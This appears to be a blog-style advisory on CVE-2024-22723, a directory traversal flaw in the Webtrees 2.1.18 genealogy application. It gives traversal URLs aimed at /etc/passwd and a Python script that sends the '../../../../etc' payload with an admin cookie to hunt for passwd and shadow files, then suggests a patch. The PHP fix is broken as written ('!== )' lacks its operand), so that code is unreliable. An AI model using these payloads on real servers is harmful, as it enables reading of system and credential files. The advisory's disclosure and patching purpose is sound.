CVE-2024-22723 - Directory Traversal in Webtrees 2.1.18 — How Attackers Can Escape ‘media/’ and Access Sensitive Files

---

Overview

A new vulnerability, CVE-2024-22723, has been discovered in Webtrees 2.1.18, a popular open-source genealogy web application. This flaw lets attackers with administrator access abuse the media_folder URL parameter to break out of a restricted directory (media/) and potentially access sensitive files anywhere on the server’s filesystem.

Let’s break down how this vulnerability works, look at example attack scenarios, see proof-of-concept code, and discuss how you can protect your sites.

What is Webtrees?

Webtrees is used to manage family trees online. It stores pictures, documents, and more, organizing them in a directory called media/. By design, even admins should only be able to manage files inside this folder, not access files elsewhere on the server.

The Vulnerability Explained

- Unsafe Input: When Webtrees builds paths for file access or listing, it trusts the value of the media_folder URL parameter.
- Traversal Attack: By supplying directory traversal sequences (like ../), an attacker can escape media/.
- Who is affected? Only administrators. But in multi-admin setups, a malicious admin could exploit this flaw without server access.

Proof-of-Concept Attack

Suppose your site is at:
https://example.com/webtrees/admin_media.php?media_folder=photos

If a user changes the media_folder parameter in the browser address bar like so

https://example.com/webtrees/admin_media.php?media_folder=../../../../

Webtrees will attempt to list files relative to the server root (or higher up the directory stack), depending on server configuration. This can expose files like:

- /etc/passwd

Example: Reading /etc/passwd (on Linux servers)

https://example.com/webtrees/admin_media.php?media_folder=../../../../etc

You’ll see a listing that includes passwd, and clicking it will let you view its contents if the server’s file reading code isn’t further restricted.

The vulnerable code is (simplified for clarity)

// This is a simplified illustration
$media_folder = $_GET['media_folder'] ?? '';
$path = $MEDIA_DIR . $media_folder;
// No sanitization!
$files = scandir($path);

Exploitation in Python (Just for Educational Purposes)

import requests

base_url = 'https://example.com/webtrees/admin_media.php';
payload = '../../../../etc'
params = {'media_folder': payload}

# Simulate admin session cookies...
cookies = {'webtrees_session': 'your_session_cookie_here'}

resp = requests.get(base_url, params=params, cookies=cookies)
print(resp.text)  # Look for files like passwd, shadow, etc.

References

- VulDB Entry: CVE-2024-22723
- Official Webtrees Site
- OWASP Directory Traversal

Is This a Remote Code Execution (RCE)?

Not directly, but reading certain configuration files could quickly lead to further attacks like RCE. For example, if you can read database configuration files or application secrets, you might get login credentials that let you access other systems.

How to Fix

- Patch: Upgrade to the latest version of Webtrees (see releases).
- Workaround: Always validate and sanitize path parameters. Don’t allow .. in user input, or use realpath() and verify the resolved path is within your intended base directory.

Example PHP fix

$media_folder = $_GET['media_folder'] ?? '';
$path = realpath($MEDIA_DIR . $media_folder);
if (strpos($path, realpath($MEDIA_DIR)) !== ) {
    die("Access denied.");
}
$files = scandir($path);

Conclusion

CVE-2024-22723 is a real-world example of why path traversal bugs matter. Even trusted users (admins) should be coded against, as an insecure parameter can accidentally (or maliciously) expose the heart of your server’s filesystem. If you run Webtrees, patch ASAP!

If you need more technical details or help patching your installation, check out Webtrees support forums or your problem may already have a hotfix in the latest version. Stay secure!

Timeline

Published on: 02/28/2024 06:15:49 UTC
Last modified on: 08/01/2024 13:47:01 UTC